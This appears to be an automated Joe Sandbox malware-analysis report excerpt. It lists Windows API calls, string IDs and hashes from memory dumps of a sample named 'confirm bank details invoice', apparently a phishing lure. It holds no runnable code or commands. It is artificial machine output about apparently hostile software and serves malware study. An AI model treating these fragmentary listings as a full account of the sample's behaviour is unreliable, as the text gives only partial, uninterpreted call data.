                    • Instruction ID: 355c209229be5de0a5de1c29a033361f89acdc910b5951b738a349c574cf69ce
                    • Opcode Fuzzy Hash: bbfad8aa261702e94026511695e7dff532d27bb5fbd839c39904aab231b07e11
                    • Instruction Fuzzy Hash: 75D0A730900B22AFC7204F20F80C6627AD8BF05301F00843AE949D22A4D7B4C880CA14
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,004741BB,00474341,?,0047422F,?,004741BB,?,?,?,?,004739FE,?,00000001), ref: 00474359
                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0047436B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                    • API String ID: 2574300362-3689287502
                    • Opcode ID: 8009f866b089fe4a7b3d2fc9c1d2b24e2d62db00e79898dc44b28c6f4fdf02e4
                    • Instruction ID: 43a9197d3f931c058b0199cbd85fa3ad38930f1ca12abf6fb93fa295c0d45665
                    • Opcode Fuzzy Hash: 8009f866b089fe4a7b3d2fc9c1d2b24e2d62db00e79898dc44b28c6f4fdf02e4
                    • Instruction Fuzzy Hash: 60D0A730940722AFD7214F30F8486627ADCBF11715F00853AE889D2290D7B4D880CA14
                    APIs
                    • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,004B052F,?,004B06D7), ref: 004B0572
                    • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 004B0584
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                    • API String ID: 2574300362-1587604923
                    • Opcode ID: d1d1c49c4518dbc9fc7bff599e55342ec87130ebf5914c60eb175f4123107376
                    • Instruction ID: 7303beabd10e01d079d656541ac716a3ecdf5c5a030267badf3a9bf97bebb413
                    • Opcode Fuzzy Hash: d1d1c49c4518dbc9fc7bff599e55342ec87130ebf5914c60eb175f4123107376
                    • Instruction Fuzzy Hash: 4CD05E74800322AAD7309F20A909A537BE4BF05301F10882AE841D2694D674C480CA34
                    APIs
                    • LoadLibraryA.KERNEL32(oleaut32.dll,?,004B051D,?,004B05FE), ref: 004B0547
                    • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 004B0559
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: RegisterTypeLibForUser$oleaut32.dll
                    • API String ID: 2574300362-1071820185
                    • Opcode ID: d4afc18452ad52f89dbc323864d4ab351382216a7ba359687c165ad5e72c0242
                    • Instruction ID: 7f6d01046181909fc6ba2f819973a3e11fc963cb62bea207462474b8b2fcd908
                    • Opcode Fuzzy Hash: d4afc18452ad52f89dbc323864d4ab351382216a7ba359687c165ad5e72c0242
                    • Instruction Fuzzy Hash: A5D0A734800722BFC730CF20F9096537AE4BF05302F10C43EE446D2694E674C880CA24
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,004CECBE,?,004CEBBB), ref: 004CECD6
                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 004CECE8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                    • API String ID: 2574300362-1816364905
                    • Opcode ID: a3f1258934fa6f64a2cac4e17f3296a11519cf70a6a88b8486cee691f8a5aaf0
                    • Instruction ID: 9211af953f0f0e9175f804ff38eec62349df2b731c3b31c88df771dab969521a
                    • Opcode Fuzzy Hash: a3f1258934fa6f64a2cac4e17f3296a11519cf70a6a88b8486cee691f8a5aaf0
                    • Instruction Fuzzy Hash: 89D0A735800733AFCB205F61F948B177AE8BF01300F00843EF846D2290DB74C880DA54
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,00000000,004CBAD3,00000001,004CB6EE,?,0050DC00), ref: 004CBAEB
                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 004CBAFD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetModuleHandleExW$kernel32.dll
                    • API String ID: 2574300362-199464113
                    • Opcode ID: 71451e9f0dcf4bd6772752eb5b7744d4a622d3aa05cb4ce575ac5321966aec93
                    • Instruction ID: 561a7d4f063b204603c21ee474fcb992b9f3aeef5c1a0fba6862ac8bb697c288
                    • Opcode Fuzzy Hash: 71451e9f0dcf4bd6772752eb5b7744d4a622d3aa05cb4ce575ac5321966aec93
                    • Instruction Fuzzy Hash: ABD05E74C00B239EC7309F20B849F227AD8BF01300F00442EA84392694E774D880CA58
                    APIs
                    • LoadLibraryA.KERNEL32(advapi32.dll,?,004D3BD1,?,004D3E06), ref: 004D3BE9
                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 004D3BFB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: RegDeleteKeyExW$advapi32.dll
                    • API String ID: 2574300362-4033151799
                    • Opcode ID: 6ced73b16ddf44628bfafef04586f12310175b5ed5b8e2cfd5a1d052c5f9a3f6
                    • Instruction ID: 59997a66e1a97b543e7c9c8a994c4a7402285c4998c18d95ba68d824dd958fad
                    • Opcode Fuzzy Hash: 6ced73b16ddf44628bfafef04586f12310175b5ed5b8e2cfd5a1d052c5f9a3f6
                    • Instruction Fuzzy Hash: B4D0A771910722DFC7205F60F908617BEF5BF02715B10443BE445E2390D6B4D480CE15
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: acef7c53798e28da6e66394525c290c31fd72af7b280d5eef9c911689456919b
                    • Instruction ID: 6d12f9723cf2da0705ad0ffaa06fa19bd71cbecfa405157914844f96b9da91b2
                    • Opcode Fuzzy Hash: acef7c53798e28da6e66394525c290c31fd72af7b280d5eef9c911689456919b
                    • Instruction Fuzzy Hash: F1C17D75A0021AEFCB14CF94C884AAEB7B5FF59710F10859AE901EF291D734EE81DB94
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 004CAAB4
                    • CoUninitialize.OLE32 ref: 004CAABF
                      • Part of subcall function 004B0213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 004B027B
                    • VariantInit.OLEAUT32(?), ref: 004CAACA
                    • VariantClear.OLEAUT32(?), ref: 004CAD9D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                    • String ID:
                    • API String ID: 780911581-0
                    • Opcode ID: 13388016763fe641d0a48865f79a987efd2417458b2c7c413f24feb4cf528e17
                    • Instruction ID: d7dfeb771d6e5c8d8722df8d8277463f8dbc10d0ff4d81cb64b81a701d61c841
                    • Opcode Fuzzy Hash: 13388016763fe641d0a48865f79a987efd2417458b2c7c413f24feb4cf528e17
                    • Instruction Fuzzy Hash: F9A148396047059FC750EF15C481B5AB7E5BF48718F04844EFA9A9B3A2CB38ED15CB8A
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Variant$AllocClearCopyInitString
                    • String ID:
                    • API String ID: 2808897238-0
                    • Opcode ID: 5c9c13140101b9a90e9247efb8172739215b07a5f9d94ec766d6dd5772d8df17
                    • Instruction ID: 3f15e56a3455fe9835b2867b0c52a5934b5aed92034d4a6ac97761a933c4b1ce
                    • Opcode Fuzzy Hash: 5c9c13140101b9a90e9247efb8172739215b07a5f9d94ec766d6dd5772d8df17
                    • Instruction Fuzzy Hash: 23518230A04306ABDF24AF67949166EB3F5EF6A314F20881FE946CB2D1DB789C41871D
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                    • String ID:
                    • API String ID: 3877424927-0
                    • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                    • Instruction ID: 8f15d075358429dd27e9fc29b6bd66edbf5a0a18595af90d30c35f54afd690eb
                    • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                    • Instruction Fuzzy Hash: A351C6B0A00205ABDF349FA9888456F7FA1AF42325F24877FF825863D0D7789F518B59
                    APIs
                    • GetWindowRect.USER32(01127790,?), ref: 004DC544
                    • ScreenToClient.USER32(?,00000002), ref: 004DC574
                    • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 004DC5DA
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Window$ClientMoveRectScreen
                    • String ID:
                    • API String ID: 3880355969-0
                    • Opcode ID: 57692c9d820a013c472940b4133c16989b3c0fd6f9a5c0938f9ccdc7f3690d50
                    • Instruction ID: c168503594f982c471f4faf314667fa95e0642b1a6891cf63be0c16f2b7d4d9b
                    • Opcode Fuzzy Hash: 57692c9d820a013c472940b4133c16989b3c0fd6f9a5c0938f9ccdc7f3690d50
                    • Instruction Fuzzy Hash: 7D515C75900206AFCF10DF68D8E1AAE7BB6EB55320F20865BF8159B390D734ED41CB94
                    APIs
                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 004AC462
                    • __itow.LIBCMT ref: 004AC49C
                      • Part of subcall function 004AC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 004AC753
                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 004AC505
                    • __itow.LIBCMT ref: 004AC55A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend$__itow
                    • String ID:
                    • API String ID: 3379773720-0
                    APIs
                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 004B3966
                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 004B3982
                    • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 004B39EF
                    • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 004B3A4D
                    Similarity
                    • API ID: KeyboardState$InputMessagePostSend
                    • String ID:
                    • API String ID: 432972143-0
                    APIs
                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 004BE742
                    • GetLastError.KERNEL32(?,00000000), ref: 004BE768
                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 004BE78D
                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 004BE7B9
                    Similarity
                    • API ID: CreateHardLink$DeleteErrorFileLast
                    • String ID:
                    • API String ID: 3321077145-0
                    APIs
                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004DB5D1
                    Similarity
                    • API ID: InvalidateRect
                    • String ID:
                    • API String ID: 634782764-0
                    APIs
                    • ClientToScreen.USER32(?,?), ref: 004DD807
                    • GetWindowRect.USER32(?,?), ref: 004DD87D
                    • PtInRect.USER32(?,?,004DED5A), ref: 004DD88D
                    • MessageBeep.USER32(00000000), ref: 004DD8FE
                    Similarity
                    • API ID: Rect$BeepClientMessageScreenWindow
                    • String ID:
                    • API String ID: 1352109105-0
                    APIs
                    • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 004B3AB8
                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 004B3AD4
                    • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 004B3B34
                    • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 004B3B92
                    Similarity
                    • API ID: KeyboardState$InputMessagePostSend
                    • String ID:
                    • API String ID: 432972143-0
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004A4038
                    • __isleadbyte_l.LIBCMT ref: 004A4066
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 004A4094
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 004A40CA
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                    • String ID:
                    • API String ID: 3058430110-0
                    APIs
                    • GetForegroundWindow.USER32 ref: 004D7CB9
                      • Part of subcall function 004B5F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 004B5F6F
                      • Part of subcall function 004B5F55: GetCurrentThreadId.KERNEL32 ref: 004B5F76
                      • Part of subcall function 004B5F55: AttachThreadInput.USER32(00000000,?,004B781F), ref: 004B5F7D
                    • GetCaretPos.USER32(?), ref: 004D7CCA
                    • ClientToScreen.USER32(00000000,?), ref: 004D7D03
                    • GetForegroundWindow.USER32 ref: 004D7D09
                    Similarity
                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                    • String ID:
                    • API String ID: 2759813231-0
                    APIs
                      • Part of subcall function 0048B34E: GetWindowLongW.USER32(?,000000EB), ref: 0048B35F
                    • GetCursorPos.USER32(?), ref: 004DF211
                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,004EE4C0,?,?,?,?,?), ref: 004DF226
                    • GetCursorPos.USER32(?), ref: 004DF270
                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,004EE4C0,?,?,?), ref: 004DF2A6
                    Similarity
                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                    • String ID:
                    • API String ID: 2864067406-0
                    APIs
                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004C4358
                      • Part of subcall function 004C43E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 004C4401
                      • Part of subcall function 004C43E2: InternetCloseHandle.WININET(00000000), ref: 004C449E
                    Similarity
                    • API ID: Internet$CloseConnectHandleOpen
                    • String ID:
                    • API String ID: 1463438336-0
                    APIs
                    • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 004C8AE0
                    • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 004C8AF2
                    • accept.WSOCK32(00000000,00000000,00000000), ref: 004C8AFF
                    • WSAGetLastError.WSOCK32(00000000), ref: 004C8B16
                    Similarity
                    • API ID: ErrorLastacceptselect
                    • String ID:
                    • API String ID: 385091864-0
                    APIs
                    • GetWindowLongW.USER32(?,000000EC), ref: 004D8AA6
                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004D8AC0
                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004D8ACE
                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 004D8ADC
                    Similarity
                    • API ID: Window$Long$AttributesLayered
                    • String ID:
                    • API String ID: 2169480361-0
                    APIs
                      • Part of subcall function 004B1E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,004B0ABB,?,?,?,004B187A,00000000,000000EF,00000119,?,?), ref: 004B1E77
                      • Part of subcall function 004B1E68: lstrcpyW.KERNEL32(00000000,?,?,004B0ABB,?,?,?,004B187A,00000000,000000EF,00000119,?,?,00000000), ref: 004B1E9D
                      • Part of subcall function 004B1E68: lstrcmpiW.KERNEL32(00000000,?,004B0ABB,?,?,?,004B187A,00000000,000000EF,00000119,?,?), ref: 004B1ECE
                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,004B187A,00000000,000000EF,00000119,?,?,00000000), ref: 004B0AD4
                    • lstrcpyW.KERNEL32(00000000,?,?,004B187A,00000000,000000EF,00000119,?,?,00000000), ref: 004B0AFA
                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,004B187A,00000000,000000EF,00000119,?,?,00000000), ref: 004B0B2E
                    Strings
                    Similarity
                    • API ID: lstrcmpilstrcpylstrlen
                    • String ID: cdecl
                    • API String ID: 4031866154-3896280584
                    APIs
                    • _free.LIBCMT ref: 004A2FB5
                      • Part of subcall function 0049395C: __FF_MSGBANNER.LIBCMT ref: 00493973
                      • Part of subcall function 0049395C: __NMSG_WRITE.LIBCMT ref: 0049397A
                      • Part of subcall function 0049395C: RtlAllocateHeap.NTDLL(01100000,00000000,00000001,00000001,00000000,?,?,0048F507,?,0000000E), ref: 0049399F
                    Similarity
                    • API ID: AllocateHeap_free
                    • String ID:
                    • API String ID: 614378929-0
                    APIs
                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 004B05AC
                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 004B05C7
                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 004B05DD
                    • FreeLibrary.KERNEL32(?), ref: 004B0632
                    Similarity
                    • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                    • String ID:
                    • API String ID: 3137044355-0
                    APIs
                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 004B6733
                    • _memset.LIBCMT ref: 004B6754
                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 004B67A6
                    • CloseHandle.KERNEL32(00000000), ref: 004B67AF
                    Similarity
                    • API ID: CloseControlCreateDeviceFileHandle_memset
                    • String ID:
                    • API String ID: 1157408455-0
                    APIs
                      • Part of subcall function 004AAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004AAA79
                      • Part of subcall function 004AAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004AAA83
                      • Part of subcall function 004AAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004AAA92
                      • Part of subcall function 004AAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004AAA99
                      • Part of subcall function 004AAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004AAAAF
                    • GetLengthSid.ADVAPI32(?,00000000,004AADE4,?,?), ref: 004AB21B
                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 004AB227
                    • HeapAlloc.KERNEL32(00000000), ref: 004AB22E
                    • CopySid.ADVAPI32(?,00000000,?), ref: 004AB247
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                    • String ID:
                    • API String ID: 4217664535-0
                    • Opcode ID: a5ff96bb9142f16b0bc43bac263267d036520b8e6d575897907811783a85b29c
                    • Instruction ID: 0378ad8a68d2074fea8a068106dff246a98f20d12082a51611a2cdfd88a04886
                    • Opcode Fuzzy Hash: a5ff96bb9142f16b0bc43bac263267d036520b8e6d575897907811783a85b29c
                    • Instruction Fuzzy Hash: 1A11E272A00204AFCB149F94CC48BBFB7A9EF9A308F14806FE54297211D739AE44CB54
                    APIs
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 004AB498
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004AB4AA
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004AB4C0
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004AB4DB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    • Opcode ID: 824aad3e2e8bbb34760a51ec1746e5481d2189f3e349b60f5795145473d724f8
                    • Instruction ID: 826aeadebd3b61570b2df414282ba1ded2dec5d23250487a041fe15bde50b3a9
                    • Opcode Fuzzy Hash: 824aad3e2e8bbb34760a51ec1746e5481d2189f3e349b60f5795145473d724f8
                    • Instruction Fuzzy Hash: E011487A900218FFEB11DFA9CD81E9DBBB4FB09700F204092E604B7291D771AE11DB94
                    APIs
                      • Part of subcall function 0048B34E: GetWindowLongW.USER32(?,000000EB), ref: 0048B35F
                    • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0048B5A5
                    • GetClientRect.USER32(?,?), ref: 004EE69A
                    • GetCursorPos.USER32(?), ref: 004EE6A4
